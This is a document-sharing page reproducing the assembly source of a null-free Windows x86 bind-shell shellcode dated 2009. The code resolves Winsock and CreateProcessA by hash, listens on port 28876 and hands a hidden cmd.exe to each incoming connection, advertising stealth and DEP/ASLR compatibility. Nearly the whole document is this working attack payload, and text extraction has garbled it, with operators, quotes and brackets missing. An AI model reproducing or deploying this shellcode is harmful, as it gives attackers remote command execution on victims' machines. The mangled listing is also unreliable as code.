《Windowsx86null-freebindshellforWindows5_0-7_0allservice.txt》由会员分享,可在线阅读,更多相关《Windowsx86null-freebindshellforWindows5_0-7_0allservice.txt(6页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。
1、 Windows x86 null-free bindshell for Windows 5.0-7.0 all service packsBITS 32; Windows x86 null-free bindshell for Windows 5.0-7.0 all service packs.; (See ; Based largely on code and ideas (C) 2005 by Dafydd Stuttard, NGS Software.; (See ; Thanks to Pete Beck.; Features both in this and the origina
2、l code:; + NULL Free; + Windows version and service pack independant.; Improvements of this code over the original:; + No assumptions are made about the values of registers.; + /3GB compatible: pointers are not assume to be smaller than 0x80000000.; + DEP/ASLR compatible: data is not executed, code
3、is not modified.; + Windows 7 compatible: kernel32 is found based on the length of its name.; + Stealth: does not display a console windows on the target machine when ; cmd.exe is executed.; + Allows an unlimited number of consecutive connections.; + Can except connections on almost any port. The ra
4、nge of acceptable port; numbers is only limited by the fact that the negative value of the port; number must not contain nulls.port equ 28876 ; The port number to bind to.%if (-port & 0xFF) = 0) | (-port & 0xFF00 = 0) %error The given port number would result in NULLs in the code :(%endifAF_INET equ
5、 2; These hashes are calculated with a separate tool.hash_xor_value equ 0x71hash_start_value equ 0x36hash_kernel32_CreateProcessA equ 0xB7hash_kernel32_LoadLibraryA equ 0x8Fhash_ws2_32_WSAStartup equ 0x09hash_ws2_32_WSASocketA equ 0x98hash_ws2_32_bind equ 0x66hash_ws2_32_listen equ 0x56hash_ws2_32_a
6、ccept equ 0x77sizeof_proc_address_table equ 7 * 4offset_WSAStartup_in_hash_table equ 2offset_accept_in_hash_table equ 6%define B2W(b1,b2) (b2) 8) + (b1)%define W2DW(w1,w2) (w2) 16) + (w1)%define B2DW(b1,b2,b3,b4) (b4) 24) + (b3) 16) + (b2) Ldr MOV ESI, ESI + 0x1C ; ESI = PEB-Ldr.InInitOrder (first m
7、odule)next_module: MOV EBP, ESI + 0x08 ; EBP = InInitOrderX.base_address MOV EDI, ESI + 0x20 ; EDI = InInitOrderX.module_name (unicode string) MOV ESI, ESI ; ESI = InInitOrderX.flink (next module) CMP EDI + 12*2, CL ; modul JNE next_module ; No: try next module.; Create hash table and ws2_32 (for Lo
8、adLibraryA) on the stack: PUSH ECX ; Stack = 00 00 00 00 PUSH B2DW(2, _, 3, 2) ; Stack = s2_32%if (hash_ws2_32_accept != w) %error The hash for ws2_32.accept is not a w%endif PUSH B2DW(hash_ws2_32_bind, hash_ws2_32_listen, hash_ws2_32_accept, s) ; hash, hash, ws2_32end_of_hash_table_marker equ s PUS
9、H B2DW(hash_kernel32_CreateProcessA, hash_kernel32_LoadLibraryA, hash_ws2_32_WSAStartup, hash_ws2_32_WSASocketA)sizeof_hash_table equ 7 MOV ESI, ESP ; ESI - Hash table; Reserve space for WSADATA MOV CH, 0x3 ; ECX = 0x300 SUB ESP, ECX ; Reserve space for WSADATA; Create a bunch of NULLs on the stack
10、SUB ESP, ECX ; Reserve space for NULLs MOV EDI, ESP ; EDI = &(NULLs) SALC ; AL = 0 REP STOSB ; Prepare arguments for various functions on the stack:; WSASocket(_in int af=2, _in int type=1, _in int protocol=0,; _in LPWSAPROTOCOL_INFO lpProtocolInfo=0, _in GROUP g=0, ; _in DWORD dwFlags=0) ; _in LPWS
11、APROTOCOL_INFO lpProtocolInfo=0 ; _in GROUP g=0 ; _in DWORD dwFlags=0 ; _in int protocol=0 INC ECX ; PUSH ECX ; _in int type = SOCK_STREAM (1) INC ECX ; PUSH ECX ; _in int af = AF_INET (2); WSAStartup(_in WORD wVersionRequested=2, _out LPWSADATA lpWSADATa=stack) PUSH EDI ; _out LPWSADATA lpWSAData =
12、 &(WSADATA) PUSH ECX ; _in WORD wVersionRequested = 2 (2.0); Set up EDI so that a proc addresses table can be created in the NULLs,; followed by sufficient space to store a struct sockaddr_in: SUB EDI, BYTE sizeof_proc_address_table + sizeof_sockaddr_inget_proc_address_loop: MOVSB ; EDI = hash DEC E
13、DI ; Restore EDI; Find the PE header and export and names tables of the module: MOV EBX, EBP + 0x3C ; EBX = &(PE header) MOV EBX, EBP + EBX + 0x78 ; EBX = offset(export table) ADD EBX, EBP ; EBX = &(export table) MOV ECX, EBX + 0x20 ; ECX = offset(names table) ADD ECX, EBP ; ECX = &(names table) PUS
14、H ESI ; Save ESI; Hash each function name and check it against t XOR EDX, EDX ; EDX = function number (0)next_function_loop:; Get the next function name: INC EDX ; Increment function number MOV ESI, ECX + EDX * 4 ; ESI = offset(function name) ADD ESI, EBP ; ESI = &(function name) MOV AH, hash_start_
15、value ; Initialize the hashhash_loop:; Hash the function name: LODSB ; Load a character of the function name XOR AL, hash_xor_value ; Calculate a hash SUB AH, AL ; CMP AL, hash_xor_value ; Is this the terminating 0 byte? JNE hash_loop ; No: continue hashing CMP AH, EDI ; Yes: Does the hash match ?;
16、Check if the hash matches and loop if not: JNZ next_function_loop POP ESI ; Restore ESI; Find the address of the requested function: MOV ECX, EBX + 0x24 ; ECX = offset ordinals table ADD ECX, EBP ; ECX = &oridinals table MOVZX EDX, WORD ECX + 2 * EDX ; EDX = ordinal number of function MOV ECX, EBX +
17、 0x1C ; ECX = offset address table ADD ECX, EBP ; ECX = &address table MOV EAX, EBP ; EAX = &(module) ADD EAX, ECX + 4 * EDX ; EAX = &(function); Save the address of the requested function: STOSD ; Save proc address; When needed, call LoadLibraryA to start looking for ws2_32.dll functions: CMP BYTE
18、ESI, hash_ws2_32_WSAStartup ; We just found LoadLibraryA JNE skip_load_library ; LEA EBX, ESI - offset_WSAStartup_in_hash_table + offset_accept_in_hash_table PUSH EBX ; _in LPCTSTR lpFileName = &(ws2_32) CALL EAX ; LoadLibraryA(&ws2_32) PUSH EDI ; Save proc address tableWSAStartup XCHG EAX, EBP ; EB
19、P = &(ws2_32.dll)skip_load_library:; Continue until all hashes have been found: CMP BYTE ESI, end_of_hash_table_marker JNE get_proc_address_loop ; POP ESI; Call WSAStartup (Arguments are already on the stack) LODSD CALL EAX ; WSASTARTUP; Call WSASocket (Arguments are already on the stack) LODSD CALL
20、 EAX XCHG EAX, EBP ; EBP = Server socket; Create a struct sockaddr_in on the stack for use by bind()sizeof_sockaddr_in equ 2 + 2 + 4 + 8 SUB DWORD EDI, -W2DW( AF_INET, B2W(port 8, port & 0xFF); sin_family = AF_INET, sin_port = (port, little endian!); Set up the 2nd and 3rd argument for bind:; bind(_
21、in SOCKET s=(added later), _in const struct sockaddr *name, _in int namelen) PUSH BYTE 0 PUSH EDI ; _in const struct sockaddr *name = &(sockaddr_in); bind(), listen() and accept() all take the server socket as their first; argument. listen() and accept() only need NULLs for the remaining arguments;
22、and the arguments for bind() are already on the stack. Because bind() and ; accept() return 0 and listen() returns a socket, which is not 0, a loop can be; used to call them:; listen(_in SOCKET s=(added later), _in int backlog=0); accept(_in SOCKET s=(added later), _in struct sockaddr *addr=0, _inou
23、t int *addrlen=0)call_loop: LODSDaccept_loop: PUSH EBP ; _in SOCKET s = Server socket descriptor CALL EAX; Check if accept() has returned a socket: TEST EAX, EAX JZ call_loop; Create structures on the stack for CreateProcessA; STARTUPINFO ; DWORD cb 00-03: = sizeof(STARTUPINFO); LPTSTR lpReserved 04
24、-07: 0; LPTSTR lpDesktop 08-0B: 0; LPTSTR lpTitle 0C-0F: 0; DWORD dwX 10-13: 0; DWORD dwY 14-17: 0; DWORD dwXSize 18-1B: 0; DWORD dwYSize 1C-1F: 0; DWORD dwXCountChars 20-23: 0; DWORD dwYCountChars 24-27: 0; DWORD dwFillAttribute 28-2B: 0; DWORD dwFlags 2C-2F: (STARTF_USESTD_HANDLES 0x100); WORD wSh
25、owWindow 30-31: 0; WORD cbReserved2 32-33: 0; LPBYTE lpReserved2 34-37: 0; HANDLE hStdInput 38-3B: (Socket descriptor); HANDLE hStdOutput 3C-3F: (Socket descriptor); HANDLE hStdError 40-43: (Socket descriptor); sizeof_STARTUPINFO equ 0x44offset_dwFlags_in_STARTUPINFO equ 0x2Coffset_hStdInput_in_STAR
26、TUPINFO equ 0x38; Each call to accept() removes two DWORDS off the stack. These must be put back; or ESP will run off the stack eventually: XOR EDX, EDX ; EDX = 0 PUSH EDX ; Restore stack #1; Well also create a struct STARTUPINFO PUSH B2DW(c, m, d, ) ; Restore stack #2 and STARTUPINFO.cb = cmd ( 0)
27、LEA EDI, ESP + offset_hStdInput_in_STARTUPINFO; EDI = &(STARTUPINFO.hStdInput) STOSD ; STARTUPINFO.hStdInput = Socket descriptor STOSD ; STARTUPINFO.hStdOutput = Socket descriptor STOSD ; STARTUPINFO.hStdError = Socket descriptor MOV BYTE EDI - sizeof_STARTUPINFO + offset_dwFlags_in_STARTUPINFO + 1,
28、 1 ; STARTUPINFO.dwFlags = STARTF_USESTDHANDLES (0x100); CreateProcess(.) PUSH ESP XCHG ESP, EDI ; _out LPPROCESS_INFORMATION lpProcessInformation = &(STARTUPINFO) + sizeof(STARTUPINFO) PUSH EDI ; _in LPSTARTUPINFO lpStartupInfo = &(STARTUPINFO) PUSH EDX ; _in_opt LPCTSTR lpCurrentDirectory = NULL P
29、USH EDX ; _in_opt LPVOID lpEnvironment = NULL PUSH EDX ; _in DWORD dwCreationFlags = 0 MOV BYTE EDI-5*4+3, 0x8 ; _in DWORD dwCreationFlags = CREATE_NO_WINDOW (0x08000000) PUSH EDI ; _in BOOL bInheritHandles = TRUE (0) PUSH EDX ; _in_opt LPSECURITY_ATTRIBUTES lpThreadAttributes = NULL PUSH EDX ; _in_opt LPSECURITY_ATTRIBUTES lpProcessAttributes = NULL PUSH EDI ; _inout_opt LPTSTR lpCommandLine = &(cmd ) PUSH EDX ; _in_opt LPCTSTR lpApplicationName = NULL CALL ESI - sizeof_proc_address_table; Load accept() into EAX and jump back into our code. MOV EAX, ESI - 4 JMP accept_loop; 2009-07-27